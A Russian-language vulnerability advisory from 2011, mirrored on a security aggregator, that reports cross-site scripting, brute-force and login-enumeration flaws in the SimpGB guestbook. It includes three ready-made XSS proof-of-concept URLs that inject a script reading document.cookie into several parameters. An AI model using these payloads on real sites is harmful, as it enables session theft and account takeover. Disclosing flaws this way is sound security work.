Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25545
HistoryJan 26, 2011 - 12:00 a.m.

Новые уязвимости в SimpGB

2011-01-2600:00:00
vulners.com
8

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, Brute Force, Insufficient Anti-automation и Abuse of Functionality уязвимостях в
SimpGB.

XSS (WASC-08):

POST запрос на странице http://site/guestbook.php в параметрах poster, postingid и location в функции Preview. Если в гостевой книге
используется капча, то для атаки необходим рабочий код капчи. Или через GET запрос:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

В данном функционале нет защиты от автоматизированных запросов.

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

В данном функционале можно выявлять логины.

Уязвимы SimpGB v1.49.02 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4690/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua